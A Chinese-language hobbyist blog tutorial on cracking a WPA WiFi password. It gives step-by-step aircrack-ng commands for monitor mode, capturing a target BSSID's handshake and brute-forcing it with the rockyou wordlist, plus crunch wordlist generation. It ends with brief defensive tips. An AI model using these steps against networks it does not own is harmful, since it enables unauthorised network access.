破解wifi(物理黑客)

时间:2024-02-21 10:12:14

题记

       大家好啊,我也知道我写一堆东西也没啥人看,这只是自娱自乐,但也是鞭策我的一种方式,也是让我回顾的便捷途径。这些天一直看大佬讲的挖src实战经验,也没时间记笔记。好几个实战我都想实操,奈何工具还没到我手,小米wifi刚到,下一个就是badusb了,在下个就是vps了,我已经迫不及待的准备把我的靶场与想法实现了。真想体验体验一键上线cs的感觉的。物理黑客也是黑客(哼)。不断学习,我将会是中国最伟大的黑客(中二脸)。是真的,我越来越认为网安是我们越来越重视的东西,这东西我们落下美国太多年了,加强网安建设自我辈开始。

一、准备工作

1、usb无线网卡,我买的小米随身wifi,即插即用,不用安装驱动。

2、vm服务全部开启。

3、kali设为桥接模式,桥接模式依赖的是网卡。

二、操作步骤

1、开启虚拟机,把kali上线。

2、插入酷似usb的随身wifi。

3、ifconfig看一下网卡接口,名字一般是wlan0.

4、开启无线网卡监听模式

airmon-ng start wlan0,之后在查看网卡接口,发现名字变了。

5、查看周围网络

airodump-ng wlan0mon

中间这个是目标wifi,抓到wifi就Ctrl+c停止。这时候需要注意的是此wifi的信道为3,所以我们要把网卡监听信道调成3,airodump-ng wlan0mon -c 3。

6、创建一个目录,用来存放抓到的握手包文件。

mkdir pojie

7、开始抓包

airodump-ng -c 3 --bssid B8:3A:08:C5:88:71 -w pojie/ wlan0mon 注意:信道不能错,文件抓到包后会存在pojie目录下,生成一个-01.cap文件。

8、另开一个窗口进行攻击,使链接wifi的设备重连wifi,我们抓取中间包。

9、回到之前窗口我们可以看到成功抓到包了。

10、结束掉抓包后开始暴力破解。

aircrack-ng -a2 -b B8:3A:08:C5:88:71 -w /usr/share/wordlists/rockyou.txt pojie/-01.cap

注意:初次使用字典需要解压。

gzip -d /usr/share/wordlists/rockyou.txt.gz

或者自己传一个字典去干爆密码。

11、破解成功图如下(密码被打马赛克,其实不重要,总不能来我家蹭网吧)。

12、关闭网卡监听模式,然后就能上网了。

airmon-ng stop wlan0mon

三、爆破字典

1、在kali里,是默认自带了字典的,分别放在下面三个文件中:

/usr/share/wordlist

/usr/share/wfuzz/wordlist

/usr/share/seclists,有一个password

2、生成一个指定文件名的密码文件,密码长度为1到8位

crunch 1 8 123456 -o  mimam/mima.txt

3、自己网上搜集搜集,好字典才是王道。

四、注意事项

1、防止这种攻击最简单的方法是设置贼复杂贼长的密码;

2、不要使用WEP加密方式,非常容易被破解;

3、监听信道和wifi信道一定要保持一致。

参考链接:https://mp.weixin.qq.com/s/VuQ0eIm1zTuP5bzYGvFmBQ